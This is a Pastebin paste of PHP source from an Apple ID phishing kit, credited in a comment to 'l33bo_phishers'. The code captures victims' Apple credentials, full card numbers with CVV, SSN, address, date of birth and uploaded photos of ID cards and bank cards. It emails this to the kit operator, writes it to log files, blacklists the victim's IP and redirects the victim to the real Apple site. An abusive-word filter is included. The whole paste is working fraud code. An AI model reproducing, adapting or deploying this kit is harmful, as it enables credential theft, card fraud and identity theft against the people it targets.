SHARE
TWEET

Untitled

a guest Apr 27th, 2018 91 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. <?php
  2. error_reporting(0);
  3. ini_set('display_errors', 0);
  4. require "assets/includes/session_protect.php";
  5. require "assets/includes/functions.php";
  6. require "assets/includes/language.php";
  7. require "assets/includes/One_Time.php";
  8. require "assets/includes/enc.php";
  9. require "_cz.php";
  10. require "setting.php";
  11. $rand = rand(1,9999999);
  12. if($_POST["upload"] === "0") {
  13.  
  14. if(isset($_POST['mname']) && !empty($_POST['mname'])) {
  15. $mname = $_POST['mname'];
  16. }
  17. else {
  18. $mname = "";
  19. }
  20. $userid = $_SESSION["user"];
  21. $password = $_SESSION["pass"];
  22. $name=$_POST["fname"]." ".$mname." ".$_POST["lname"];
  23. $dob=$_POST["dob"];
  24. $address=$_POST["address"].", ".$_POST["town"].", ".$_POST["county"];
  25. $postcode=$_POST["postcode"];
  26. $country=$_POST["country"];
  27. $telephone=$_POST["telephone"];
  28. $ssn=$_POST["ssn"];
  29. $ccname=$_POST["ccname"];
  30. $ccno=$_POST["ccno"];
  31. $ccexp=$_POST["ccexp"];
  32. $climit = $_POST['climit'];  
  33. $citizenid = $_POST['citizenid'];  
  34. $qatarid = $_POST['qatarid'];  
  35. $naid = $_POST['naid'];
  36. $bans = $_POST['bans'];
  37. $passport = $_POST['passport'];
  38. $civilid = $_POST['civilid'];
  39. $numbid = $_POST['numbid'];
  40. $secode=$_POST["secode"];
  41. $acno=$_POST["acno"];
  42. $sort=$_POST["sortcode"];
  43. $ip = $_SERVER['REMOTE_ADDR'];
  44. $systemInfo = systemInfo($_SERVER['REMOTE_ADDR']);
  45. $ccno = str_replace(' ', '', $ccno);
  46. $last4 = substr($ccno, 12, 16);
  47. $domain = $_SERVER['SERVER_NAME'];
  48. $bin = $_POST['ccno'];
  49. $bin = preg_replace('/\s/', '', $bin);
  50. $bin = substr($bin,0,6);
  51. $url = "https://lookup.binlist.net/".$bin;
  52. $headers = array();
  53. $headers[] = 'Accept-Version: 3';
  54. $ch = curl_init();  
  55. curl_setopt($ch,CURLOPT_URL,$url);
  56. curl_setopt($ch,CURLOPT_RETURNTRANSFER,true);
  57. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
  58. curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);
  59. $resp=curl_exec($ch);
  60. curl_close($ch);
  61. $xBIN = json_decode($resp, true);
  62.  
  63. $_SESSION['bank_name'] = $xBIN["bank"]["name"];
  64. $_SESSION['bank_scheme'] = strtoupper($xBIN["scheme"]);
  65. $_SESSION['bank_type'] = strtoupper($xBIN["type"]);
  66. $_SESSION['bank_brand'] = strtoupper($xBIN["brand"]);
  67. $_SESSION['country_name'] = $xBIN["country"]["name"];
  68.  
  69. if ($_SESSION['bank_brand'] == "TRADITIONAL") {
  70. str_replace('TRADITIONAL', 'CLASSIC', $_SESSION['bank_brand']);
  71. }
  72.  
  73. $VictimInfo1 = "".$_SERVER['REMOTE_ADDR']." (".gethostbyaddr($_SERVER['REMOTE_ADDR']).")";
  74. $VictimInfo2 = "".$systemInfo['city'].", ".$systemInfo['region'].", ".$systemInfo['country'];
  75. $VictimInfo4 = "".$systemInfo['browser'];
  76. $VictimInfo5 = "".$systemInfo['os'];
  77. $headers = "From: $name <hiroscam-$rand@rjsking.team>\r\n";
  78. $headers .= "Content-Type: text/html\r\n";
  79. $subj = "".$bin." - ".strtoupper($xBIN["scheme"])." " .strtoupper($xBIN["type"]). " ".strtoupper($xBIN["brand"])." " .$xBIN["bank"]["name"]." ( " .$xBIN["country"]["name"]. " | ".$ip." )";
  80. $to = $Your_Email;
  81. $warnsubj = "Abuse";
  82.  
  83. $warn = "A user (with ip: $ip) has attempted to send you a completed form containing abusive language. l33bo_Phishers is against abusive form filling and has redirected this user to the official site while blocking the form.";
  84. $bad_words = array('9999','4r5e','5h1t','5hit','a55','anal','anus','ar5e','arrse','arse','ass','ass-fucker','asses','assfucker','assfukka','asshole','assholes','asswhole','a_s_s','b!tch','b00bs','b17ch','b1tch','ballbag','balls','ballsack','bastard','beastial','beastiality','bellend','bestial','bestiality','bi+ch','biatch','bitch','bitcher','bitchers','bitches','bitchin','bitching','bloody','blow job','blowjob','blowjobs','boiolas','bollock','bollok','boner','boob','boobs','booobs','boooobs','booooobs','booooooobs','breasts','buceta','bugger','bum','bunny fucker','butt','butthole','buttmuch','buttplug','c0ck','c0cksucker','carpet muncher','cawk','chink','cipa','cl1t','clit','clitoris','clits','cnut','cock','cock-sucker','cockface','cockhead','cockmunch','cockmuncher','cocks','cocksuck ','cocksucked ','cocksucker','cocksucking','cocksucks ','cocksuka','cocksukka','cok','cokmuncher','coksucka','coon','cox','crap','cum','cummer','cumming','cums','cumshot','cunilingus','cunillingus','cunnilingus','cunt','cuntlick ','cuntlicker ','cuntlicking ','cunts','cyalis','cyberfuc','cyberfuck ','cyberfucked ','cyberfucker','cyberfuckers','cyberfucking ','d1ck','damn','dick','dickhead','dildo','dildos','dink','dinks','dirsa','dlck','dog-fucker','doggin','dogging','donkeyribber','doosh','duche','dyke','ejaculate','ejaculated','ejaculates ','ejaculating ','ejaculatings','ejaculation','ejakulate','f u c k','f u c k e r','f4nny','fag','fagging','faggitt','faggot','faggs','fagot','fagots','fags','fanny','fannyflaps','fannyfucker','fanyy','fatass','fcuk','fcuker','fcuking','feck','fecker','felching','fellate','fellatio','fingerfuck ','fingerfucked ','fingerfucker ','fingerfuckers','fingerfucking ','fingerfucks ','fistfuck','fistfucked ','fistfucker ','fistfuckers ','fistfucking ','fistfuckings ','fistfucks ','flange','fook','fooker','fuck','fucka','fucked','fucker','fuckers','fuckhead','fuckheads','fuckin','fucking','fuckings','fuckingshitmotherfucker','fuckme ','fucks','fuckwhit','fuckwit','fudge packer','fudgepacker','fuk','fuker','fukker','fukkin','fuks','fukwhit','fukwit','fux','fux0r','f_u_c_k','gangbang','gangbanged ','gangbangs ','gaylord','gaysex','goatse','God','god-dam','god-damned','goddamn','goddamned','hardcoresex ','hell','heshe','hoar','hoare','hoer','homo','hore','horniest','horny','hotsex','jack-off ','jackoff','jap','jerk-off ','jism','jiz ','jizm ','jizz','kawk','knob','knobead','knobed','knobend','knobhead','knobjocky','knobjokey','kock','kondum','kondums','kum','kummer','kumming','kums','kunilingus','l3i+ch','l3itch','labia','lmfao','lust','lusting','m0f0','m0fo','m45terbate','ma5terb8','ma5terbate','masochist','master-bate','masterb8','masterbat*','masterbat3','masterbate','masterbation','masterbations','masturbate','mo-fo','mof0','mofo','mothafuck','mothafucka','mothafuckas','mothafuckaz','mothafucked ','mothafucker','mothafuckers','mothafuckin','mothafucking ','mothafuckings','mothafucks','mother fucker','motherfuck','motherfucked','motherfucker','motherfuckers','motherfuckin','motherfucking','motherfuckings','motherfuckka','motherfucks','muff','mutha','muthafecker','muthafuckker','muther','mutherfucker','n1gga','n1gger','nazi','nigg3r','nigg4h','nigga','niggah','niggas','niggaz','nigger','niggers ','nob','nob jokey','nobhead','nobjocky','nobjokey','numbnuts','nutsack','orgasim ','orgasims ','orgasm','orgasms ','p0rn','pawn','pecker','penis','penisfucker','phonesex','phuck','phuk','phuked','phuking','phukked','phukking','phuks','phuq','pigfucker','pimpis','piss','pissed','pisser','pissers','pisses ','pissflaps','pissin ','pissing','pissoff ','poop','porn','porno','pornography','pornos','prick','pricks ','pron','pube','pusse','pussi','pussies','pussy','pussys ','rectum','retard','rimjaw','rimming','s hit','s.o.b.','sadist','schlong','screwing','scroat','scrote','scrotum','semen','sex','sh!+','sh!t','sh1t','shag','shagger','shaggin','shagging','shemale','shi+','shit','shitdick','shite','shited','shitey','shitfuck','shitfull','shithead','shiting','shitings','shits','shitted','shitter','shitters ','shitting','shittings','shitty ','skank','slut','sluts','smegma','smut','snatch','son-of-a-bitch','spac','spunk','s_h_i_t','t1tt1e5','t1tties','teets','teez','testical','testicle','tit','titfuck','tits','titt','tittie5','tittiefucker','titties','tittyfuck','tittywank','titwank','tosser','turd','tw4t','twat','twathead','twatty','twunt','twunter','v14gra','v1gra','vagina','viagra','vulva','w00se','wang','wank','wanker','wanky','whoar','whore','willies','willy','xrated','fuck','fuckoff','fuck off','fucking','nigger','nigerian','Nigerian','scam','cunt','wankers','twats','scammers','shit','wanker','cunt','asshole','arsehole','passwd','sample');
  85.  
  86. $data = "
  87. <html>
  88. <head>
  89. <style>
  90. @media (max-width: 520px) {
  91.       .block-grid {
  92.         min-width: 320px!important;
  93.         max-width: 100%!important;
  94.         width: 100%!important;
  95.         display: block!important;
  96.       }
  97.  
  98.       .col {
  99.         min-width: 320px!important;
  100.         max-width: 100%!important;
  101.         width: 100%!important;
  102.         display: block!important;
  103.       }
  104.  
  105.         .col > div {
  106.           margin: 0 auto;
  107.         }
  108.  
  109.       img.fullwidth {
  110.         max-width: 100%!important;
  111.       }
  112.             img.fullwidthOnMobile {
  113.         max-width: 100%!important;
  114.       }
  115.       .no-stack .col {
  116.                 min-width: 0!important;
  117.                 display: table-cell!important;
  118.             }
  119.             .no-stack.two-up .col {
  120.                 width: 50%!important;
  121.             }
  122.             .no-stack.mixed-two-up .col.num4 {
  123.                 width: 33%!important;
  124.             }
  125.             .no-stack.mixed-two-up .col.num8 {
  126.                 width: 66%!important;
  127.             }
  128.             .no-stack.three-up .col.num4 {
  129.                 width: 33%!important;
  130.             }
  131.             .no-stack.four-up .col.num3 {
  132.                 width: 25%!important;
  133.             }
  134.       .mobile_hide {
  135.         min-height: 0px!important;
  136.         max-height: 0px!important;
  137.         max-width: 0px!important;
  138.         display: none!important;
  139.         overflow: hidden!important;
  140.         font-size: 0px!important;
  141.       }
  142.     }
  143. </style>
  144. <table class='nl-container' style='border-collapse: collapse;table-layout: fixed;border-spacing: 0;mso-table-lspace: 0pt;mso-table-rspace: 0pt;vertical-align: top;min-width: 320px;Margin: 0 auto;background-color: #FFFFFF;width: 100%' cellpadding='0' cellspacing='0'>
  145.     <tbody>
  146.     <tr style='vertical-align: top'>
  147.         <td style='word-break: break-word;border-collapse: collapse !important;vertical-align: top'>
  148.     <!--[if (mso)|(IE)]><table width='100%' cellpadding='0' cellspacing='0' border='0'><tr><td align='center' style='background-color: #FFFFFF;'><![endif]-->
  149.  
  150.     <div style='background-color:transparent;'>
  151.       <div style='Margin: 0 auto;min-width: 320px;max-width: 480px;overflow-wrap: break-word;word-wrap: break-word;word-break: break-word;background-color: #FFFFFF;' class='block-grid '>
  152.         <div style='border-collapse: collapse;display: table;width: 100%;background-color:#FFFFFF;'>
  153.           <!--[if (mso)|(IE)]><table width='100%' cellpadding='0' cellspacing='0' border='0'><tr><td style='background-color:transparent;' align='center'><table cellpadding='0' cellspacing='0' border='0' style='width: 480px;'><tr class='layout-full-width' style='background-color:#FFFFFF;'><![endif]-->
  154.  
  155.               <!--[if (mso)|(IE)]><td align='center' width='480' style='background-color:#47A7E0; width:480px; padding-right: 0px; padding-left: 0px; padding-top:5px; padding-bottom:5px; border-top: 0px solid transparent; border-left: 0px solid transparent; border-bottom: 0px solid transparent; border-right: 0px solid transparent;' valign='top'><![endif]-->
  156.             <div class='col num12' style='min-width: 320px;max-width: 480px;display: table-cell;vertical-align: top;'>
  157.               <div style='background-color: #47A7E0; width: 100% !important;'>
  158.               <!--[if (!mso)&(!IE)]><!--><div style='border-top: 0px solid transparent; border-left: 0px solid transparent; border-bottom: 0px solid transparent; border-right: 0px solid transparent; padding-top:5px; padding-bottom:5px; padding-right: 0px; padding-left: 0px;'><!--<![endif]-->
  159.  
  160.                  
  161.                     <div class=''>
  162.     <!--[if mso]><table width='100%' cellpadding='0' cellspacing='0' border='0'><tr><td style='padding-right: 60px; padding-left: 60px; padding-top: 10px; padding-bottom: 10px;'><![endif]-->
  163.     <div style='color:#FFFFFF;line-height:150%;font-family:Tahoma, Verdana, Segoe, sans-serif; padding-right: 60px; padding-left: 60px; padding-top: 10px; padding-bottom: 10px;'> 
  164.         <div style='font-size:12px;line-height:18px;color:#FFFFFF;font-family:Tahoma, Verdana, Segoe, sans-serif;text-align:left;'><p style='margin: 0;font-size: 14px;line-height: 21px'>&#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160;'NOBODY CARES ABOUT ME'</p></div>
  165.     </div>
  166.     <!--[if mso]></td></tr></table><![endif]-->
  167. </div>
  168.                  
  169.               <!--[if (!mso)&(!IE)]><!--></div><!--<![endif]-->
  170.               </div>
  171.             </div>
  172.           <!--[if (mso)|(IE)]></td></tr></table></td></tr></table><![endif]-->
  173.         </div>
  174.       </div>
  175.     </div>    <div style='background-color:transparent;'>
  176.       <div style='Margin: 0 auto;min-width: 320px;max-width: 480px;overflow-wrap: break-word;word-wrap: break-word;word-break: break-word;background-color: #FFFFFF;' class='block-grid '>
  177.         <div style='border-collapse: collapse;display: table;width: 100%;background-color:#FFFFFF;'>
  178.           <!--[if (mso)|(IE)]><table width='100%' cellpadding='0' cellspacing='0' border='0'><tr><td style='background-color:transparent;' align='center'><table cellpadding='0' cellspacing='0' border='0' style='width: 480px;'><tr class='layout-full-width' style='background-color:#FFFFFF;'><![endif]-->
  179.  
  180.               <!--[if (mso)|(IE)]><td align='center' width='480' style=' width:480px; padding-right: 0px; padding-left: 0px; padding-top:5px; padding-bottom:5px; border-top: 0px solid transparent; border-left: 0px solid transparent; border-bottom: 0px solid transparent; border-right: 0px solid transparent;' valign='top'><![endif]-->
  181.             <div class='col num12' style='min-width: 320px;max-width: 480px;display: table-cell;vertical-align: top;'>
  182.               <div style='background-color: transparent; width: 100% !important;'>
  183.               <!--[if (!mso)&(!IE)]><!--><div style='border-top: 0px solid transparent; border-left: 0px solid transparent; border-bottom: 0px solid transparent; border-right: 0px solid transparent; padding-top:5px; padding-bottom:5px; padding-right: 0px; padding-left: 0px;'><!--<![endif]-->
  184.  
  185.                  
  186.                     <div class=''>
  187.     <!--[if mso]><table width='100%' cellpadding='0' cellspacing='0' border='0'><tr><td style='padding-right: 10px; padding-left: 10px; padding-top: 10px; padding-bottom: 10px;'><![endif]-->
  188.     <div style='color:#555555;line-height:200%;font-family:Tahoma, Verdana, Segoe, sans-serif; padding-right: 10px; padding-left: 10px; padding-top: 10px; padding-bottom: 10px;'> 
  189.         <div style='font-size:12px;line-height:24px;color:#555555;font-family:Tahoma, Verdana, Segoe, sans-serif;text-align:left;'><p style='margin: 0;font-size: 12px;line-height: 24px'>++=================== [ Apple Account ] =================++</p><p style='margin: 0;font-size: 12px;line-height: 24px'>[#] Username :  ".$userid."<br>[#] Password :   ".$password."</p><p style='margin: 0;font-size: 12px;line-height: 24px'>++==================== [ Credit Card ] ==================++</p><p style='margin: 0;font-size: 12px;line-height: 24px'>[#] Cardholder Name : ".$ccname."<br>[#] Card Number :   ".$ccno."<br>[#] Expiration Date :  ".$ccexp."<br>[#] Cvv2 :    ".$secode."<br>[#] Credit Card BIN :    ".$bin." | ".strtoupper($xBIN["scheme"])." ".strtoupper($xBIN["type"])." ".strtoupper($xBIN["brand"])." | ".$xBIN["bank"]["name"]."</p><p style='margin: 0;font-size: 12px;line-height: 24px'>++====================== [ Billing ] ====================++</p><p style='margin: 0;font-size: 12px;line-height: 24px'>[#] Full Name :  ".$name."<br>[#] Address :  ".$address."<br>[#] Country :    ".$country."<br>[#] Post Code : ".$postcode."<br>[#] Number Phone :  ".$telephone."<br>[#] Birth Day :   ".$dob."<br>[#] SSN :   ".$ssn."<br>++===================== [ PC Info ] ====================++</p><p style='margin: 0;font-size: 12px;line-height: 24px'>[#] From :  ".$VictimInfo1."<br>[#] Location :   ".$VictimInfo2."<br>[#] Platform : ".$VictimInfo5."<br>[#] Browser :   ".$VictimInfo4."</p></div>  
  190.     </div>
  191.     <!--[if mso]></td></tr></table><![endif]-->
  192. </div>
  193.                  
  194.               <!--[if (!mso)&(!IE)]><!--></div><!--<![endif]-->
  195.               </div>
  196.             </div>
  197.           <!--[if (mso)|(IE)]></td></tr></table></td></tr></table><![endif]-->
  198.         </div>
  199.       </div>
  200.     </div>    <div style='background-color:transparent;'>
  201.       <div style='Margin: 0 auto;min-width: 320px;max-width: 480px;overflow-wrap: break-word;word-wrap: break-word;word-break: break-word;background-color: #FFFFFF;' class='block-grid '>
  202.         <div style='border-collapse: collapse;display: table;width: 100%;background-color:#FFFFFF;'>
  203.           <!--[if (mso)|(IE)]><table width='100%' cellpadding='0' cellspacing='0' border='0'><tr><td style='background-color:transparent;' align='center'><table cellpadding='0' cellspacing='0' border='0' style='width: 480px;'><tr class='layout-full-width' style='background-color:#FFFFFF;'><![endif]-->
  204.  
  205.               <!--[if (mso)|(IE)]><td align='center' width='480' style='background-color:#47A7E0; width:480px; padding-right: 0px; padding-left: 0px; padding-top:5px; padding-bottom:5px; border-top: 0px solid transparent; border-left: 0px solid transparent; border-bottom: 0px solid transparent; border-right: 0px solid transparent;' valign='top'><![endif]-->
  206.             <div class='col num12' style='min-width: 320px;max-width: 480px;display: table-cell;vertical-align: top;'>
  207.               <div style='background-color: #47A7E0; width: 100% !important;'>
  208.               <!--[if (!mso)&(!IE)]><!--><div style='border-top: 0px solid transparent; border-left: 0px solid transparent; border-bottom: 0px solid transparent; border-right: 0px solid transparent; padding-top:5px; padding-bottom:5px; padding-right: 0px; padding-left: 0px;'><!--<![endif]-->
  209.  
  210.                  
  211.                     <div class=''>
  212.     <!--[if mso]><table width='100%' cellpadding='0' cellspacing='0' border='0'><tr><td style='padding-right: 60px; padding-left: 60px; padding-top: 10px; padding-bottom: 10px;'><![endif]-->
  213.     <div style='color:#FFFFFF;line-height:150%;font-family:Tahoma, Verdana, Segoe, sans-serif; padding-right: 60px; padding-left: 60px; padding-top: 10px; padding-bottom: 10px;'> 
  214.         <div style='font-size:12px;line-height:18px;color:#FFFFFF;font-family:Tahoma, Verdana, Segoe, sans-serif;text-align:left;'><p style='margin: 0;font-size: 14px;line-height: 21px'>&#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; 'THANKS TO GOD'</p></div>   
  215.     </div>
  216.     <!--[if mso]></td></tr></table><![endif]-->
  217. </div>
  218.                  
  219.               <!--[if (!mso)&(!IE)]><!--></div><!--<![endif]-->
  220.               </div>
  221.             </div>
  222.           <!--[if (mso)|(IE)]></td></tr></table></td></tr></table><![endif]-->
  223.         </div>
  224.       </div>
  225.     </div>   <!--[if (mso)|(IE)]></td></tr></table><![endif]-->
  226.         </td>
  227.   </tr>
  228.   </tbody>
  229.   </table>
  230.  
  231. </body></html>
  232. ";
  233.  
  234. if($Encrypt==1) {
  235. include("assets/includes/AES.php");
  236. $imputText = $data;
  237. $imputKey = $Key;
  238. $blockSize = 256;
  239. $aes = new AES($imputText, $imputKey, $blockSize);
  240. $enc = $aes->encrypt();
  241. $aes->setData($enc);
  242. $dec=$aes->decrypt();
  243. }
  244. if($Abuse_Filter==1) {
  245. foreach($bad_words as $bad_word){
  246.     if(stristr($_POST['fname'], $bad_word) !== false) {
  247.     mail($to,$warnsubj,$warn,$headers);
  248.         exit(header("Location:  https://www.google.co.uk/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&cad=rja&uact=8&ved=0ahUKEwioqpfl4oPKAhWHPxQKHYGXAjkQFggfMAA&url=https%3A%2F%2Fappleid.apple.com%2F&usg=AFQjCNF7841Jq5PLrYJwYDN8RkcZjuNVww&sig2=gKBRh04c9wVr4EOc4FARAw&bvm=bv.110151844,d.d24"));
  249.     }
  250.   if(stristr($_POST['address'], $bad_word) !== false) {
  251.     mail($to,$warnsubj,$warn,$headers);
  252.  
  253.  
  254.         exit(header("Location:  https://www.google.co.uk/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&cad=rja&uact=8&ved=0ahUKEwioqpfl4oPKAhWHPxQKHYGXAjkQFggfMAA&url=https%3A%2F%2Fappleid.apple.com%2F&usg=AFQjCNF7841Jq5PLrYJwYDN8RkcZjuNVww&sig2=gKBRh04c9wVr4EOc4FARAw&bvm=bv.110151844,d.d24"));
  255.     }
  256. }
  257. }
  258. if($Save_Log==1) {
  259.   if($Encrypt==1) {
  260.   $file=fopen("assets/logs/app.txt","a");
  261.   fwrite($file,$enc);
  262.   fclose($file);
  263.   }
  264.   else {
  265.   $file=fopen("assets/logs/app.txt","a");
  266.   fwrite($file,$data);
  267.   fclose($file);
  268.   }
  269. }
  270. if($Send_Log==1) {
  271.   if($Encrypt==1) {
  272.   mail($to,$subj,$enc,$headers);  
  273.   }
  274.   else {
  275.   mail($to,$subj,$data,$headers);
  276.      $empas   = "# ".$binq." - CC ".strtoupper($xBIN["scheme"])." " .strtoupper($xBIN["type"]). " ".strtoupper($xBIN["brand"])." " .$xBIN["bank"]["name"]." [ ".$systemInfo['country']." ]\n";
  277.     $file = fopen("assets/logs/bin.log", "a");
  278.     fwrite($file, $empas);
  279.     fclose($file);
  280.    
  281.     $file2 = $_SERVER['DOCUMENT_ROOT']."/assets/logs/._ccz_.txt";
  282.     $isi  = file_get_contents($file2);
  283.     $buka = fopen($file2,"w");
  284.        
  285.     fwrite($buka, $isi+1);
  286.     fclose($buka);
  287.    
  288.     $file3 = $_SERVER['DOCUMENT_ROOT']."/._nob_.txt";
  289.     $isi  = file_get_contents($file3);
  290.     $buka = fopen($file3,"w");
  291.        
  292.     fwrite($buka, $isi+1);
  293.     fclose($buka);
  294.   }
  295. }
  296. /*
  297. Created by l33bo_phishers -- icq: 695059760
  298. Created by l33bo_phishers -- icq: 695059760
  299. Created by l33bo_phishers -- icq: 695059760
  300. Created by l33bo_phishers -- icq: 695059760
  301. */
  302.  
  303. echo "<script>window.location='Upload.php?&sessionid=".generateRandomString(115)."&securessl=true';</script>";
  304. //header("Location: Upload.php?&sessionid=".generateRandomString(115)."&securessl=true");
  305. } else {
  306. if(!empty($_FILES["file_id"]["name"])) {
  307. $pathinfo1 = pathinfo($_FILES["file_id"]["name"]);
  308. } else {
  309. $pathinfo1 = null;
  310. }
  311. if(!empty($_FILES["file_cc-front"]["name"])) {
  312. $pathinfo2 = pathinfo($_FILES["file_cc-front"]["name"]);
  313. } else {
  314. $pathinfo2 = null;
  315. }
  316. if(!empty($_FILES["file_cc-back"]["name"])) {
  317. $pathinfo3 = pathinfo($_FILES["file_cc-back"]["name"]);
  318. } else {
  319. $pathinfo3 = null;
  320. }
  321.  
  322. if($pathinfo1 === null) {
  323. $fileid = "-";
  324. } else {
  325. $fileid = $_SESSION["user"]."-id-".sha1(uniqid().$pathinfo1["filename"]).".".$pathinfo1["extension"];
  326. @copy($_FILES["file_id"]["tmp_name"], getcwd()."/uploads/$fileid");
  327. }
  328. if($pathinfo2 === null) {
  329. $filecc1 = "-";
  330. } else {
  331. $filecc1 = $_SESSION["user"]."-cc-front-".sha1(uniqid().$pathinfo2["filename"]).".".$pathinfo2["extension"];
  332. @copy($_FILES["file_cc-front"]["tmp_name"], getcwd()."/uploads/$filecc1");
  333. }
  334. if($pathinfo3 == null) {
  335. $filecc2 = "-";
  336. } else {
  337. $filecc2=$_SESSION["user"]."-cc-back-".sha1(uniqid().$pathinfo3["filename"]).".".$pathinfo3["extension"];
  338. @copy($_FILES["file_cc-back"]["tmp_name"], getcwd()."/uploads/$filecc2");
  339. }
  340.  
  341. $ip = $_SERVER['REMOTE_ADDR'];
  342. $systemInfo = systemInfo($_SERVER['REMOTE_ADDR']);
  343. $VictimInfo1 = "| IP Address :"." ".$_SERVER['REMOTE_ADDR']." (".gethostbyaddr($_SERVER['REMOTE_ADDR']).")";
  344. $VictimInfo2 = "| Location :"." ".$systemInfo['city'].", ".$systemInfo['region'].", ".$systemInfo['country'];
  345. $VictimInfo3 = "| UserAgent :"." ".$systemInfo['useragent'];
  346. $VictimInfo4 = "| Browser :"." ".$systemInfo['browser'];
  347. $VictimInfo5 = "| Platform :"." ".$systemInfo['os'];
  348. $VictimInfo6 = "".$systemInfo['country'];
  349. $subj = $_SESSION['user']." [ ".$VictimInfo6." - $ip - ".$systemInfo['os']." ]";
  350. $to = $Your_Email;
  351. $uploader = $_SESSION["user"];
  352. $file1 = "uploads/$fileid";
  353. $file2 = "uploads/$filecc1";
  354. $file3 = "uploads/$filecc2";
  355. //if true, good; if false, zip creation failed
  356. create_tar($file1,$file2,$file3,"$uploader.tar.gz");
  357.  
  358. $random_hash = md5(date('r', time()));
  359. //define the headers we want passed. Note that they are separated with \r\n
  360. $headers = "From: Apple Credit Card & ID Card Photos <$random_hash@$random_hash.com>";
  361. //add boundary string and mime type specification
  362. $headers .= "\r\nContent-Type: multipart/mixed; boundary=\"PHP-mixed-".$random_hash."\"";
  363. //read the atachment file contents into a string,
  364. //encode it with MIME base64,
  365. //and split it into smaller chunks
  366. $attachment = chunk_split(base64_encode(file_get_contents("uploads/$uploader.zip")));
  367. //define the body of the message.
  368. ob_start(); //Turn on output buffering
  369. ?>
  370. --PHP-mixed-<?php echo $random_hash; ?>
  371. Content-Type: multipart/alternative; boundary="PHP-alt-<?php echo $random_hash; ?>"
  372.  
  373. --PHP-alt-<?php echo $random_hash; ?>
  374. Content-Type: text/plain; charset="iso-8859-1"
  375. Content-Transfer-Encoding: 7bit
  376.  
  377. Hello World!!!
  378. This is simple text email message.
  379.  
  380. --PHP-alt-<?php echo $random_hash; ?>
  381. Content-Type: text/html; charset="iso-8859-1"
  382. Content-Transfer-Encoding: 7bit
  383.  
  384. <html>
  385. <head>
  386. <style>
  387. .demotbl {
  388.     border: 0px solid #69899F;
  389.   }
  390. .demotbl th{
  391.     padding:15px;
  392.     color:#fff;
  393.     text-shadow:1px 1px 1px #568F23;
  394.     border-bottom:3px solid #02e9ff;
  395.     background-color:#02e9ff;
  396.     background:-webkit-gradient(
  397.         linear,
  398.         left bottom,
  399.         left top,
  400.         color-stop(0.02, rgb(0, 135, 128)),
  401.         color-stop(0.51, rgb(0, 135, 128)),
  402.         color-stop(0.87, rgb(0, 135, 128))
  403.         );
  404.     background: -moz-linear-gradient(
  405.         center bottom,
  406.         rgb(0, 135, 128) 3%,
  407.         rgb(3, 198, 188) 52%,
  408.         rgb(2, 233, 255) 88%
  409.         );
  410.     -webkit-border-top-left-radius:5px;
  411.     -webkit-border-top-right-radius:5px;
  412.     -moz-border-radius:5px 5px 0px 0px;
  413.     border-top-left-radius:5px;
  414.     border-top-right-radius:5px;
  415.   }
  416. .demotbl td{
  417.     padding:10px;
  418.     text-align:center;
  419.     vertical-align: top;
  420.     background-color:#DEF3CA;
  421.     border: 1px solid #BED3AB;
  422.     -moz-border-radius:2px;
  423.     -webkit-border-radius:2px;
  424.     border-radius:2px;
  425.     color:#666;
  426.     text-shadow:1px 1px 1px #fff;
  427.  
  428.   }
  429. </style>
  430. <table class='demotbl'>
  431.   <tr>
  432.       <th colspan='5'>Credit Card & ID Card Photos</th>
  433.   </tr>
  434.   <tr>
  435. <td width='200px'>Identity Card/Driver License Photos</td>
  436. <td colspan='5'><?php echo $_SERVER['SERVER_NAME'].'/uploads/'.$fileid;?></td>
  437. </tr>
  438. <tr>
  439. <td>Credit Card/Debit Card Photos (Front)</td>
  440. <td width='400px'><?php echo $_SERVER['SERVER_NAME']."/uploads/".$filecc1;?></td>
  441.   </tr>
  442. <tr>
  443. <td>Credit Card/Debit Card Photos (Back)</td>
  444. <td width='400px'><?php echo $_SERVER['SERVER_NAME']."/uploads/".$filecc2;?></td>
  445.   </tr>
  446. </table>
  447.  
  448. </body></html>
  449.  
  450. --PHP-alt-<?php echo $random_hash; ?>--
  451.  
  452. --PHP-mixed-<?php echo $random_hash; ?>
  453. Content-Type: application/zip; name="<?php echo "$uploader.zip";?>"
  454. Content-Transfer-Encoding: base64
  455. Content-Disposition: attachment
  456.  
  457. <?php echo $attachment; ?>
  458. --PHP-mixed-<?php echo $random_hash; ?>--
  459.  
  460. <?php
  461. //copy current buffer contents into $message variable and delete current output buffer
  462. $message = ob_get_clean();
  463. //send the email
  464.  
  465. @mail( $to, $subj, $message, $headers );
  466.     $file2 = $_SERVER['DOCUMENT_ROOT']."/assets/logs/._upload_.txt";
  467.     $isi  = @file_get_contents($file2);
  468.     $buka = fopen($file2,"w");
  469.     fwrite($buka, $isi+1);
  470.     fclose($buka);
  471.  
  472. if($One_Time_Access == "block")
  473. {
  474. $fp = fopen("assets/includes/blacklist.dat", "a");
  475. fputs($fp, "\r\n$ip\r\n");
  476. fclose($fp);
  477. }
  478. ?>
  479. <!DOCTYPE html>
  480. <html>
  481. <head>
  482.  
  483. <meta content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=no" name="viewport">
  484. <title>Complete</title>
  485. <link href="assets/img/favicon.ico" rel="shortcut icon" type="image/x-icon">
  486. <meta http-equiv="refresh" content="5; url=https://www.google.co.uk/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&cad=rja&uact=8&ved=0ahUKEwioqpfl4oPKAhWHPxQKHYGXAjkQFggfMAA&url=https%3A%2F%2Fappleid.apple.com%2F&usg=AFQjCNF7841Jq5PLrYJwYDN8RkcZjuNVww&sig2=gKBRh04c9wVr4EOc4FARAw&bvm=bv.110151844,d.d24" />
  487. <link href="assets/css/First.css" media="all" rel="stylesheet" type="text/css">
  488. <link href="assets/css/Second.css" rel="stylesheet" type="text/css">
  489. <link href="assets/css/Fonts.css" rel="stylesheet" type="text/css">
  490. <link href="assets/css/verify.css" rel="stylesheet" type="text/css">
  491. </head>
  492. <body id="pagecontent">
  493. <div id="content">
  494. <div class="bdd45">
  495. <nav id="xdsfv54" class="js no-touch svg no-ie7 no-ie8">
  496. <div class="HeaderObjHolder">
  497. <ul class="MobHeader">
  498. <li class="HeaderObj MobMenIconH">
  499. <label class="MobMenHol">
  500. <span class="MobMenIcon MobMenIcon-top">
